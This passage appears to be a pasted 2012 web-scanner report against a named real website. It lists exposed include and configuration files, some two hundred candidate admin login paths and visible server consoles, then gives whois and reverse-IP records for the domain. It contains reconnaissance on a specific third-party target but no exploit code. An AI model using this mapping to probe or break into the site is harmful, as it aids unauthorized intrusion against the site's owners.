  569. + OSVDB-3092: /cn/: This might be interesting... potential country code (China)
  570. + OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
  571. + OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
  572. + OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
  573. + OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
  574. + OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
  575. + OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
  576. + OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
  577. + OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
  578. + OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
  579. + OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
  580. + OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
  581. + OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
  582. + OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
  583. + OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
  584. + OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
  585. + OSVDB-3092: /dm/: This might be interesting... potential country code (Dominica)
  586. + OSVDB-3092: /do/: This might be interesting... potential country code (Dominican Republic)
  587. + OSVDB-3092: /ec/: This might be interesting... potential country code (Ecuador)
  588. + OSVDB-3092: /eg/: This might be interesting... potential country code (Egypt)
  589. + OSVDB-3092: /sv/: This might be interesting... potential country code (El Salvador)
  590. + OSVDB-3092: /gq/: This might be interesting... potential country code (Equatorial Guinea)
  591. + OSVDB-3092: /er/: This might be interesting... potential country code (Eritrea)
  592. + OSVDB-3092: /ee/: This might be interesting... potential country code (Estonia)
  593. + OSVDB-3092: /et/: This might be interesting... potential country code (Ethiopia)
  594. + OSVDB-3092: /fk/: This might be interesting... potential country code (Falkland Islands (malvinas))
  595. + OSVDB-3092: /fo/: This might be interesting... potential country code (Faroe Islands)
  596. + OSVDB-3092: /fj/: This might be interesting... potential country code (Fiji)
  597. + OSVDB-3092: /fi/: This might be interesting... potential country code (Finland)
  598. + OSVDB-3092: /fr/: This might be interesting... potential country code (France)
  599. + OSVDB-3092: /gf/: This might be interesting... potential country code (French Guiana)
  600. + OSVDB-3092: /pf/: This might be interesting... potential country code (French Polynesia)
  601. + OSVDB-3092: /tf/: This might be interesting... potential country code (French Southern Territories)
  602. + OSVDB-3092: /ga/: This might be interesting... potential country code (Gabon)
  603. + OSVDB-3092: /gm/: This might be interesting... potential country code (Gambia)
  604. + OSVDB-3092: /ge/: This might be interesting... potential country code (Georgia)
  605. + OSVDB-3092: /de/: This might be interesting... potential country code (Germany)
  606. + OSVDB-3092: /gh/: This might be interesting... potential country code (Ghana)
  607. + OSVDB-3092: /gi/: This might be interesting... potential country code (Gibraltar)
  608. + OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
  609. + OSVDB-3092: /gl/: This might be interesting... potential country code (Greenland)
  610. + OSVDB-3092: /gd/: This might be interesting... potential country code (Grenada)
  611. + OSVDB-3092: /gp/: This might be interesting... potential country code (Guadeloupe)
  612. + OSVDB-3092: /gu/: This might be interesting... potential country code (Guam)
  613. + OSVDB-3092: /gt/: This might be interesting... potential country code (Guatemala)
  614. + OSVDB-3092: /gg/: This might be interesting... potential country code (Guernsey)
  615. + OSVDB-3092: /gn/: This might be interesting... potential country code (Guinea)
  616. + OSVDB-3092: /gw/: This might be interesting... potential country code (Guinea-bissau)
  617. + OSVDB-3092: /gy/: This might be interesting... potential country code (Guyana)
  618. + OSVDB-3092: /ht/: This might be interesting... potential country code (Haiti)
  619. + OSVDB-3092: /hm/: This might be interesting... potential country code (Heard Island And Mcdonald Islands)
  620. + OSVDB-3092: /va/: This might be interesting... potential country code (Holy See (vatican City State))
  621. + OSVDB-3092: /hn/: This might be interesting... potential country code (Honduras)
  622. + OSVDB-3092: /hk/: This might be interesting... potential country code (Hong Kong)
  623. + OSVDB-3092: /hu/: This might be interesting... potential country code (Hungary)
  624. + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
  625. + OSVDB-3092: /in/: This might be interesting... potential country code (India)
  626. + OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
  627. + OSVDB-3092: /ir/: This might be interesting... potential country code (Islamic Republic Of Iran)
  628. + OSVDB-3092: /iq/: This might be interesting... potential country code (Iraq)
  629. + OSVDB-3092: /ie/: This might be interesting... potential country code (Ireland)
  630. + OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
  631. + OSVDB-3092: /il/: This might be interesting... potential country code (Israel)
  632. + OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
  633. + OSVDB-3092: /jm/: This might be interesting... potential country code (Jamaica)
  634. + OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
  635. + OSVDB-3092: /je/: This might be interesting... potential country code (Jersey)
  636. + OSVDB-3092: /jo/: This might be interesting... potential country code (Jordan)
  637. + OSVDB-3092: /kz/: This might be interesting... potential country code (Kazakhstan)
  638. + OSVDB-3092: /ke/: This might be interesting... potential country code (Kenya)
  639. + OSVDB-3092: /ki/: This might be interesting... potential country code (Kiribati)
  640. + OSVDB-3092: /kp/: This might be interesting... potential country code (Democratic People's Republic Of Korea)
  641. + OSVDB-3092: /kr/: This might be interesting... potential country code (Republic Of Korea)
  642. + OSVDB-3092: /kw/: This might be interesting... potential country code (Kuwait)
  643. + OSVDB-3092: /kg/: This might be interesting... potential country code (Kyrgyzstan)
  644. + OSVDB-3092: /la/: This might be interesting... potential country code (Lao People's Democratic Republic)
  645. + OSVDB-3092: /lv/: This might be interesting... potential country code (Latvia)
  646. + OSVDB-3092: /lb/: This might be interesting... potential country code (Lebanon)
  647. + OSVDB-3092: /ls/: This might be interesting... potential country code (Lesotho)
  648. + OSVDB-3092: /lr/: This might be interesting... potential country code (Liberia)
  649. + OSVDB-3092: /ly/: This might be interesting... potential country code (Libyan Arab Jamahiriya)
  650. + OSVDB-3092: /li/: This might be interesting... potential country code (Liechtenstein)
  651. + OSVDB-3092: /lt/: This might be interesting... potential country code (Lithuania)
  652. + OSVDB-3092: /lu/: This might be interesting... potential country code (Luxembourg)
  653. + OSVDB-3092: /mo/: This might be interesting... potential country code (Macao)
  654. + OSVDB-3092: /mk/: This might be interesting... potential country code (Macedonia)
  655. + OSVDB-3092: /mg/: This might be interesting... potential country code (Madagascar)
  656. + OSVDB-3092: /mw/: This might be interesting... potential country code (Malawi)
  657. + OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
  658. + OSVDB-3092: /mv/: This might be interesting... potential country code (Maldives)
  659. + OSVDB-3092: /ml/: This might be interesting... potential country code (Mali)
  660. + OSVDB-3092: /mt/: This might be interesting... potential country code (Malta)
  661. + OSVDB-3092: /mh/: This might be interesting... potential country code (Marshall Islands)
  662. + OSVDB-3092: /mq/: This might be interesting... potential country code (Martinique)
  663. + OSVDB-3092: /mr/: This might be interesting... potential country code (Mauritania)
  664. + OSVDB-3092: /mu/: This might be interesting... potential country code (Mauritius)
  665. + OSVDB-3092: /yt/: This might be interesting... potential country code (Mayotte)
  666. + OSVDB-3092: /mx/: This might be interesting... potential country code (Mexico)
  667. + OSVDB-3092: /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
  668. + OSVDB-3092: /md/: This might be interesting... potential country code (Republic Of Moldova)
  669. + OSVDB-3092: /mc/: This might be interesting... potential country code (Monaco)
  670. + OSVDB-3092: /mn/: This might be interesting... potential country code (Mongolia)
  671. + OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
  672. + OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
  673. + OSVDB-3092: /ma/: This might be interesting... potential country code (Morocco)
  674. + OSVDB-3092: /mz/: This might be interesting... potential country code (Mozambique)
  675. + OSVDB-3092: /mm/: This might be interesting... potential country code (Myanmar)
  676. + OSVDB-3092: /na/: This might be interesting... potential country code (Namibia)
  677. + OSVDB-3092: /nr/: This might be interesting... potential country code (Nauru)
  678. + OSVDB-3092: /np/: This might be interesting... potential country code (Nepal)
  679. + OSVDB-3092: /nl/: This might be interesting... potential country code (Netherlands)
  680. + OSVDB-3092: /an/: This might be interesting... potential country code (Netherlands Antilles)
  681. + OSVDB-3092: /nc/: This might be interesting... potential country code (New Caledonia)
  682. + OSVDB-3092: /nz/: This might be interesting... potential country code (New Zealand)
  683. + OSVDB-3092: /ni/: This might be interesting... potential country code (Nicaragua)
  684. + OSVDB-3092: /ne/: This might be interesting... potential country code (Niger)
  685. + OSVDB-3092: /ng/: This might be interesting... potential country code (Nigeria)
  686. + OSVDB-3092: /nu/: This might be interesting... potential country code (Niue)
  687. + OSVDB-3092: /nf/: This might be interesting... potential country code (Norfolk Island)
  688. + OSVDB-3092: /mp/: This might be interesting... potential country code (Northern Mariana Islands)
  689. + OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
  690. + OSVDB-3092: /om/: This might be interesting... potential country code (Oman)
  691. + OSVDB-3092: /pk/: This might be interesting... potential country code (Pakistan)
  692. + OSVDB-3092: /pw/: This might be interesting... potential country code (Palau)
  693. + OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
  694. + OSVDB-3092: /pa/: This might be interesting... potential country code (Panama)
  695. + OSVDB-3092: /pg/: This might be interesting... potential country code (Papua New Guinea)
  696. + OSVDB-3092: /py/: This might be interesting... potential country code (Paraguay)
  697. + OSVDB-3092: /pe/: This might be interesting... potential country code (Peru)
  698. + OSVDB-3092: /ph/: This might be interesting... potential country code (Philippines)
  699. + OSVDB-3092: /pn/: This might be interesting... potential country code (Pitcairn)
  700. + OSVDB-3092: /pl/: This might be interesting... potential country code (Poland)
  701. + OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
  702. + OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico)
  703. + OSVDB-3092: /qa/: This might be interesting... potential country code (Qatar)
  704. + OSVDB-3092: /re/: This might be interesting... potential country code (RÉunion)
  705. + OSVDB-3092: /ro/: This might be interesting... potential country code (Romania)
  706. + OSVDB-3092: /ru/: This might be interesting... potential country code (Russian Federation)
  707. + OSVDB-3092: /rw/: This might be interesting... potential country code (Rwanda)
  708. + OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
  709. + OSVDB-3092: /sh/: This might be interesting... potential country code (Saint Helena)
  710. + OSVDB-3092: /kn/: This might be interesting... potential country code (Saint Kitts And Nevis)
  711. + OSVDB-3092: /lc/: This might be interesting... potential country code (Saint Lucia)
  712. + OSVDB-3092: /mf/: This might be interesting... potential country code (Saint Martin)
  713. + OSVDB-3092: /pm/: This might be interesting... potential country code (Saint Pierre And Miquelon)
  714. + OSVDB-3092: /vc/: This might be interesting... potential country code (Saint Vincent And The Grenadines)
  715. + OSVDB-3092: /ws/: This might be interesting... potential country code (Samoa)
  716. + OSVDB-3092: /sm/: This might be interesting... potential country code (San Marino)
  717. + OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
  718. + OSVDB-3092: /sa/: This might be interesting... potential country code (Saudi Arabia)
  719. + OSVDB-3092: /sn/: This might be interesting... potential country code (Senegal)
  720. + OSVDB-3092: /rs/: This might be interesting... potential country code (Serbia)
  721. + OSVDB-3092: /sc/: This might be interesting... potential country code (Seychelles)
  722. + OSVDB-3092: /sl/: This might be interesting... potential country code (Sierra Leone)
  723. + OSVDB-3092: /sg/: This might be interesting... potential country code (Singapore)
  724. + OSVDB-3092: /sk/: This might be interesting... potential country code (Slovakia)
  725. + OSVDB-3092: /si/: This might be interesting... potential country code (Slovenia)
  726. + OSVDB-3092: /sb/: This might be interesting... potential country code (Solomon Islands)
  727. + OSVDB-3092: /so/: This might be interesting... potential country code (Somalia)
  728. + OSVDB-3092: /za/: This might be interesting... potential country code (South Africa)
  729. + OSVDB-3092: /gs/: This might be interesting... potential country code (South Georgia And The South Sandwich Islands)
  730. + OSVDB-3092: /es/: This might be interesting... potential country code (Spain)
  731. + OSVDB-3092: /lk/: This might be interesting... potential country code (Sri Lanka)
  732. + OSVDB-3092: /sd/: This might be interesting... potential country code (Sudan)
  733. + OSVDB-3092: /sr/: This might be interesting... potential country code (Suriname)
  734. + OSVDB-3092: /sj/: This might be interesting... potential country code (Svalbard And Jan Mayen)
  735. + OSVDB-3092: /sz/: This might be interesting... potential country code (Swaziland)
  736. + OSVDB-3092: /se/: This might be interesting... potential country code (Sweden)
  737. + OSVDB-3092: /ch/: This might be interesting... potential country code (Switzerland)
  738. + OSVDB-3092: /sy/: This might be interesting... potential country code (Syrian Arab Republic)
  739. + OSVDB-3092: /tw/: This might be interesting... potential country code (Taiwan)
  740. + OSVDB-3092: /tj/: This might be interesting... potential country code (Tajikistan)
  741. + OSVDB-3092: /tz/: This might be interesting... potential country code (United Republic Of Tanzania)
  742. + OSVDB-3092: /th/: This might be interesting... potential country code (Thailand)
  743. + OSVDB-3092: /tl/: This might be interesting... potential country code (Timor-leste)
  744. + OSVDB-3092: /tg/: This might be interesting... potential country code (Togo)
  745. + OSVDB-3092: /tk/: This might be interesting... potential country code (Tokelau)
  746. + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
  747. + OSVDB-3092: /tt/: This might be interesting... potential country code (Trinidad And Tobago)
  748. + OSVDB-3092: /tn/: This might be interesting... potential country code (Tunisia)
  749. + OSVDB-3092: /tr/: This might be interesting... potential country code (Turkey)
  750. + OSVDB-3092: /tm/: This might be interesting... potential country code (Turkmenistan)
  751. + OSVDB-3092: /tc/: This might be interesting... potential country code (Turks And Caicos Islands)
  752. + OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
  753. + OSVDB-3092: /ug/: This might be interesting... potential country code (Uganda)
  754. + OSVDB-3092: /ua/: This might be interesting... potential country code (Ukraine)
  755. + OSVDB-3092: /ae/: This might be interesting... potential country code (United Arab Emirates)
  756. + OSVDB-3092: /gb/: This might be interesting... potential country code (United Kingdom)
  757. + OSVDB-3092: /us/: This might be interesting... potential country code (United States)
  758. + OSVDB-3092: /um/: This might be interesting... potential country code (United States Minor Outlying Islands)
  759. + OSVDB-3092: /uy/: This might be interesting... potential country code (Uruguay)
  760. + OSVDB-3092: /uz/: This might be interesting... potential country code (Uzbekistan)
  761. + OSVDB-3092: /vu/: This might be interesting... potential country code (Vanuatu)
  762. + OSVDB-3092: /ve/: This might be interesting... potential country code (Venezuela)
  763. + OSVDB-3092: /vn/: This might be interesting... potential country code (Viet Nam)
  764. + OSVDB-3092: /vg/: This might be interesting... potential country code (British Virgin Islands)
  765. + OSVDB-3092: /vi/: This might be interesting... potential country code (U.S. Virgin Islands)
  766. + OSVDB-3092: /wf/: This might be interesting... potential country code (Wallis And Futuna)
  767. + OSVDB-3092: /eh/: This might be interesting... potential country code (Western Sahara)
  768. + OSVDB-3092: /ye/: This might be interesting... potential country code (Yemen)
  769. + OSVDB-3092: /zm/: This might be interesting... potential country code (Zambia)
  770. + OSVDB-3092: /zw/: This might be interesting... potential country code (Zimbabwe)
  771. + OSVDB-3092: /www/2: This might be interesting...
  772. + OSVDB-3093: /includes/db.inc: Include files (.inc) should not be served in plain text.
  773. + OSVDB-3093: /includes/sendmail.inc: Include files (.inc) should not be served in plain text.
  774. + OSVDB-3092: /license.txt: License file found may identify site software.
  775. + OSVDB-3092: /install.txt: Install file found may identify site software.
  776. + OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
  777. + OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
  778. + /config/config.txt: Configuration file found.
  779. + /config/readme.txt: Readme file found.
  780. + /data/readme.txt: Readme file found.
  781. + /log/readme.txt: Readme file found.
  782. + /logs/readme.txt: Readme file found.
  783. + /uploads/readme.txt: Readme file found.
  784. + /admin1.php: Admin login page found.
  785. + /admin.asp: Admin login page/section found.
  786. + /admin/account.asp: Admin login page/section found.
  787. + /admin/account.html: Admin login page/section found.
  788. + /admin/account.php: Admin login page/section found.
  789. + /admin/controlpanel.asp: Admin login page/section found.
  790. + /admin/controlpanel.html: Admin login page/section found.
  791. + /admin/controlpanel.php: Admin login page/section found.
  792. + /admin/cp.asp: Admin login page/section found.
  793. + /admin/cp.html: Admin login page/section found.
  794. + /admin/cp.php: Admin login page/section found.
  795. + /admin/home.asp: Admin login page/section found.
  796. + /admin/home.php: Admin login page/section found.
  797. + /admin/index.asp: Admin login page/section found.
  798. + /admin/index.html: Admin login page/section found.
  799. + /admin/login.asp: Admin login page/section found.
  800. + /admin/login.html: Admin login page/section found.
  801. + /admin/login.php: Admin login page/section found.
  802. + /admin1.asp: Admin login page/section found.
  803. + /admin1.html: Admin login page/section found.
  804. + /admin1/: Admin login page/section found.
  805. + /admin2.asp: Admin login page/section found.
  806. + /admin2.html: Admin login page/section found.
  807. + /admin2.php: Admin login page/section found.
  808. + /admin4_account/: Admin login page/section found.
  809. + /admin4_colon/: Admin login page/section found.
  810. + /admincontrol.asp: Admin login page/section found.
  811. + /admincontrol.html: Admin login page/section found.
  812. + /admincontrol.php: Admin login page/section found.
  813. + /administer/: Admin login page/section found.
  814. + /administr8.asp: Admin login page/section found.
  815. + /administr8.html: Admin login page/section found.
  816. + /administr8.php: Admin login page/section found.
  817. + /administr8/: Admin login page/section found.
  818. + /administracao.php: Admin login page/section found.
  819. + /administraçao.php: Admin login page/section found.
  820. + /administracao/: Admin login page/section found.
  821. + /administraçao/: Admin login page/section found.
  822. + /administracion.php: Admin login page/section found.
  823. + /administracion/: Admin login page/section found.
  824. + /administrateur.php: Admin login page/section found.
  825. + /administrateur/: Admin login page/section found.
  826. + /administratie/: Admin login page/section found.
  827. + /administration.html: Admin login page/section found.
  828. + /administration.php: Admin login page/section found.
  829. + /administration/: Admin login page/section found.
  830. + /administrator.asp: Admin login page/section found.
  831. + /administrator.html: Admin login page/section found.
  832. + /administrator.php: Admin login page/section found.
  833. + /administrator/account.asp: Admin login page/section found.
  834. + /administrator/account.html: Admin login page/section found.
  835. + /administrator/account.php: Admin login page/section found.
  836. + /administrator/index.asp: Admin login page/section found.
  837. + /administrator/index.html: Admin login page/section found.
  838. + /administrator/index.php: Admin login page/section found.
  839. + /administrator/login.asp: Admin login page/section found.
  840. + /administrator/login.html: Admin login page/section found.
  841. + /administrator/login.php: Admin login page/section found.
  842. + /administratoraccounts/: Admin login page/section found.
  843. + /administrators/: Admin login page/section found.
  844. + /administrivia/: Admin login page/section found.
  845. + /adminisztrátora.php: Admin login page/section found.
  846. + /adminisztrátora/: Admin login page/section found.
  847. + /adminpanel.asp: Admin login page/section found.
  848. + /adminpanel.html: Admin login page/section found.
  849. + /adminpanel.php: Admin login page/section found.
  850. + /adminpro/: Admin login page/section found.
  851. + /admins.asp: Admin login page/section found.
  852. + /admins.html: Admin login page/section found.
  853. + /admins.php: Admin login page/section found.
  854. + /admins/: Admin login page/section found.
  855. + /AdminTools/: Admin login page/section found.
  856. + /amministratore.php: Admin login page/section found.
  857. + /amministratore/: Admin login page/section found.
  858. + /autologin/: Admin login page/section found.
  859. + /banneradmin/: Admin login page/section found.
  860. + /bbadmin/: Admin login page/section found.
  861. + /beheerder.php: Admin login page/section found.
  862. + /beheerder/: Admin login page/section found.
  863. + /bigadmin/: Admin login page/section found.
  864. + /blogindex/: Admin login page/section found.
  865. + /cadmins/: Admin login page/section found.
  866. + /ccms/: Admin login page/section found.
  867. + /ccms/index.php: Admin login page/section found.
  868. + /ccms/login.php: Admin login page/section found.
  869. + /ccp14admin/: Admin login page/section found.
  870. + /cmsadmin/: Admin login page/section found.
  871. + /configuration/: Admin login page/section found.
  872. + /configure/: Admin login page/section found.
  873. + /controlpanel.asp: Admin login page/section found.
  874. + /controlpanel.html: Admin login page/section found.
  875. + /controlpanel.php: Admin login page/section found.
  876. + /controlpanel/: Admin login page/section found.
  877. + /cp.asp: Admin login page/section found.
  878. + /cp.html: Admin login page/section found.
  879. + /cp.php: Admin login page/section found.
  880. + /cpanel_file/: Admin login page/section found.
  881. + /customer_login/: Admin login page/section found.
  882. + /database_administration/: Admin login page/section found.
  883. + /Database_Administration/: Admin login page/section found.
  884. + /dir-login/: Admin login page/section found.
  885. + /directadmin/: Admin login page/section found.
  886. + /ezsqliteadmin/: Admin login page/section found.
  887. + /fileadmin.asp: Admin login page/section found.
  888. + /fileadmin.html: Admin login page/section found.
  889. + /fileadmin.php: Admin login page/section found.
  890. + /formslogin/: Admin login page/section found.
  891. + /globes_admin/: Admin login page/section found.
  892. + /hpwebjetadmin/: Admin login page/section found.
  893. + /Indy_admin/: Admin login page/section found.
  894. + /irc-macadmin/: Admin login page/section found.
  895. + /LiveUser_Admin/: Admin login page/section found.
  896. + /login_db/: Admin login page/section found.
  897. + /login-redirect/: Admin login page/section found.
  898. + /login-us/: Admin login page/section found.
  899. + /login.asp: Admin login page/section found.
  900. + /login.html: Admin login page/section found.
  901. + /login.php: Admin login page/section found.
  902. + /login1/: Admin login page/section found.
  903. + /loginflat/: Admin login page/section found.
  904. + /logo_sysadmin/: Admin login page/section found.
  905. + /Lotus_Domino_Admin/: Admin login page/section found.
  906. + /macadmin/: Admin login page/section found.
  907. + /maintenance/: Admin login page/section found.
  908. + /manuallogin/: Admin login page/section found.
  909. + /memlogin/: Admin login page/section found.
  910. + /meta_login/: Admin login page/section found.
  911. + /modelsearch/login.asp: Admin login page/section found.
  912. + /modelsearch/login.php: Admin login page/section found.
  913. + /moderator.asp: Admin login page/section found.
  914. + /moderator.html: Admin login page/section found.
  915. + /moderator.php: Admin login page/section found.
  916. + /moderator/: Admin login page/section found.
  917. + /moderator/admin.asp: Admin login page/section found.
  918. + /moderator/admin.html: Admin login page/section found.
  919. + /moderator/admin.php: Admin login page/section found.
  920. + /moderator/login.asp: Admin login page/section found.
  921. + /moderator/login.html: Admin login page/section found.
  922. + /moderator/login.php: Admin login page/section found.
  923. + /myadmin/: Admin login page/section found.
  924. + /navSiteAdmin/: Admin login page/section found.
  925. + /newsadmin/: Admin login page/section found.
  926. + /openvpnadmin/: Admin login page/section found.
  927. + /painel/: Admin login page/section found.
  928. + /panel/: Admin login page/section found.
  929. + /pgadmin/: Admin login page/section found.
  930. + /phpldapadmin/: Admin login page/section found.
  931. + /phppgadmin/: Admin login page/section found.
  932. + /phpSQLiteAdmin/: Admin login page/section found.
  933. + /platz_login/: Admin login page/section found.
  934. + /power_user/: Admin login page/section found.
  935. + /project-admins/: Admin login page/section found.
  936. + /pureadmin/: Admin login page/section found.
  937. + /radmind-1/: Admin login page/section found.
  938. + /radmind/: Admin login page/section found.
  939. + /rcLogin/: Admin login page/section found.
  940. + /server_admin_small/: Admin login page/section found.
  941. + /Server.asp: Admin login page/section found.
  942. + /Server.html: Admin login page/section found.
  943. + /Server.php: Admin login page/section found.
  944. + /ServerAdministrator/: Admin login page/section found.
  945. + /showlogin/: Admin login page/section found.
  946. + /simpleLogin/: Admin login page/section found.
  947. + /smblogin/: Admin login page/section found.
  948. + /sql-admin/: Admin login page/section found.
  949. + /ss_vms_admin_sm/: Admin login page/section found.
  950. + /sshadmin/: Admin login page/section found.
  951. + /staradmin/: Admin login page/section found.
  952. + /sub-login/: Admin login page/section found.
  953. + /Super-Admin/: Admin login page/section found.
  954. + /support_login/: Admin login page/section found.
  955. + /sys-admin/: Admin login page/section found.
  956. + /sysadmin.asp: Admin login page/section found.
  957. + /sysadmin.html: Admin login page/section found.
  958. + /sysadmin.php: Admin login page/section found.
  959. + /sysadmin/: Admin login page/section found.
  960. + /SysAdmin/: Admin login page/section found.
  961. + /SysAdmin2/: Admin login page/section found.
  962. + /sysadmins/: Admin login page/section found.
  963. + /system_administration/: Admin login page/section found.
  964. + /system-administration/: Admin login page/section found.
  965. + /ur-admin.asp: Admin login page/section found.
  966. + /ur-admin.html: Admin login page/section found.
  967. + /ur-admin.php: Admin login page/section found.
  968. + /ur-admin/: Admin login page/section found.
  969. + /useradmin/: Admin login page/section found.
  970. + /UserLogin/: Admin login page/section found.
  971. + /utility_login/: Admin login page/section found.
  972. + /v2/painel/: Admin login page/section found.
  973. + /vadmind/: Admin login page/section found.
  974. + /vmailadmin/: Admin login page/section found.
  975. + /webadmin.asp: Admin login page/section found.
  976. + /webadmin.html: Admin login page/section found.
  977. + /webadmin.php: Admin login page/section found.
  978. + /webmaster/: Admin login page/section found.
  979. + /websvn/: Admin login page/section found.
  980. + /wizmysqladmin/: Admin login page/section found.
  981. + /wp-admin/: Admin login page/section found.
  982. + /wp-login/: Admin login page/section found.
  983. + /xlogin/: Admin login page/section found.
  984. + /yonetici.asp: Admin login page/section found.
  985. + /yonetici.html: Admin login page/section found.
  986. + /yonetici.php: Admin login page/section found.
  987. + /yonetim.asp: Admin login page/section found.
  988. + /yonetim.html: Admin login page/section found.
  989. + /yonetim.php: Admin login page/section found.
  990. + OSVDB-3092: /test.asp: This might be interesting...
  991. + OSVDB-3092: /test.aspx: This might be interesting...
  992. + OSVDB-3092: /test.php: This might be interesting...
  993. + /maintenance.asp: This might be interesting...
  994. + /maintenance.aspx: This might be interesting...
  995. + /maint/: This might be interesting...
  996. + /maint.asp: This might be interesting...
  997. + /maint.aspx: This might be interesting...
  998. + /jk-status: mod_jk status page is visible.
  999. + /balancer-manager: mod_proxy_balancer management page is visible.
  1000. + /servlets-examples/: Tomcat servlets examples are visible.
  1001. + /admin-console: JBoss admin console is visible.
  1002. + /help.php: A help file was found.
  1003. + /gif/hp_invent_logo.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
  1004. + /gif/tricolor_ink_guage.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
  1005. + OSVDB-3092: /messages/: This might be interesting...
  1006. + 6448 items checked: 9 error(s) and 2137 item(s) reported on remote host
  1007. + End Time: 2012-09-25 07:34:47 (4368 seconds)
  1008. ---------------------------------------------------------------------------
  1009. + 1 host(s) tested
  1010.  
  1011.  
  1012. Whois Information:
  1013.  
  1014. Registrant:
  1015. Alegria Enterprises Limited
  1016. Trust Company Complex,
  1017. Ajeltake Road
  1018. PO Box 1405
  1019. Ajeltake Island, 96960
  1020. MH
  1021.  
  1022. Domain name: PETSEX.COM
  1023.  
  1024. Administrative Contact:
  1025. Administrator, Domain
  1026. Trust Company Complex,
  1027. Ajeltake Road
  1028. PO Box 1405
  1029. Ajeltake Island, 96960
  1030. MH
  1031. +44 1624-617-050
  1032. Technical Contact:
  1033. Administrator, Domain
  1034. Trust Company Complex,
  1035. Ajeltake Road
  1036. PO Box 1405
  1037. Ajeltake Island, 96960
  1038. MH
  1039. +44 1624-617-050
  1040.  
  1041. Registration Service Provider:
  1042. Netgroup A/S,
  1043. +45 70252686
  1044. +45 70252687 (fax)
  1045. http://www.netgroup.dk
  1046. This company may be contacted for domain login/passwords,
  1047. DNS/Nameserver changes, and general domain support questions.
  1048.  
  1049. Registrar of Record: TUCOWS, INC.
  1050. Record last updated on 20-Sep-2012.
  1051. Record expires on 14-Jan-2013.
  1052. Record created on 15-Jan-1998.
  1053.  
  1054. Registrar Domain Name Help Center:
  1055. http://tucowsdomains.com
  1056.  
  1057. Domain servers in listed order:
  1058. NS1.OXYGEN.NET
  1059. NS2.OXYGEN.NET
  1060.  
  1061. Domain status: clientTransferProhibited
  1062. clientUpdateProhibited
  1063.  
  1064.  
  1065.  
  1066. Reverse IP:
  1067.  
  1068.  
  1069.  
  1070. he hostname petsex.com resolves to the following IP addresses:
  1071. IPv4 address:199.27.135.40
  1072. Reverse DNS:cf-199-27-135-40.cloudflare.com
  1073. RIR:ARIN
  1074. Country:United States
  1075. City:San Francisco, CA
  1076. RBL Status:Clear
  1077. IPv4 address:173.245.61.114
  1078. Reverse DNS:cf-173-245-61-114.cloudflare.com
  1079. RIR:ARIN
  1080. Country:United States
  1081. City:San Francisco, CA
  1082. RBL Status:Clear
  1083. Whois information on 199.27.135.40:
  1084. #
  1085. # Query terms are ambiguous. The query is assumed to be:
  1086. # "n 199.27.135.40"
  1087. #
  1088. # Use "?" to get help.
  1089. #
  1090. #
  1091. # The following results may also be obtained via:
  1092. # http://whois.arin.net/rest/nets;q=199.27.135.40?showDetails=true&showARIN=false&ext=netref2
  1093. #
  1094. NetRange:199.27.128.0 - 199.27.135.255
  1095. CIDR:199.27.128.0/21
  1096. OriginAS:AS13335
  1097. NetName:CLOUDFLARENET
  1098. NetHandle:NET-199-27-128-0-1
  1099. Parent:NET-199-0-0-0-0
  1100. NetType:Direct Assignment
  1101. RegDate:2010-08-19
  1102. Updated:2012-03-02
  1103. OrgName:CloudFlare, Inc.
  1104. OrgId:CLOUD14
  1105. Address:665 Third Street #207
  1106. City:San Francisco
  1107. StateProv:CA
  1108. PostalCode:94107
  1109. Country:US
  1110. RegDate:2010-07-09
  1111. Updated:2011-11-03
  1112. Comment:http://www.cloudflare.com/
  1113. OrgAbuseHandle:ABUSE2916-ARIN
  1114. OrgAbuseName:Abuse
  1115. OrgAbusePhone:+1-650-319-8930
  1116. OrgAbuseEmail:abuse@cloudflare.com
  1117. OrgNOCHandle:NOC11962-ARIN
  1118. OrgNOCName:NOC
  1119. OrgNOCPhone:+1-650-319-8930
  1120. OrgNOCEmail:noc@cloudflare.com
  1121. OrgTechHandle:ADMIN2521-ARIN
  1122. OrgTechName:Admin
  1123. OrgTechPhone:+1-650-319-8930
  1124. OrgTechEmail:admin@cloudflare.com
  1125. RAbuseHandle:ABUSE2916-ARIN
  1126. RAbuseName:Abuse
  1127. RAbusePhone:+1-650-319-8930
  1128. RAbuseEmail:abuse@cloudflare.com
  1129. RNOCHandle:NOC11962-ARIN
  1130. RNOCName:NOC
  1131. RNOCPhone:+1-650-319-8930
  1132. RNOCEmail:noc@cloudflare.com
  1133. RTechHandle:ADMIN2521-ARIN
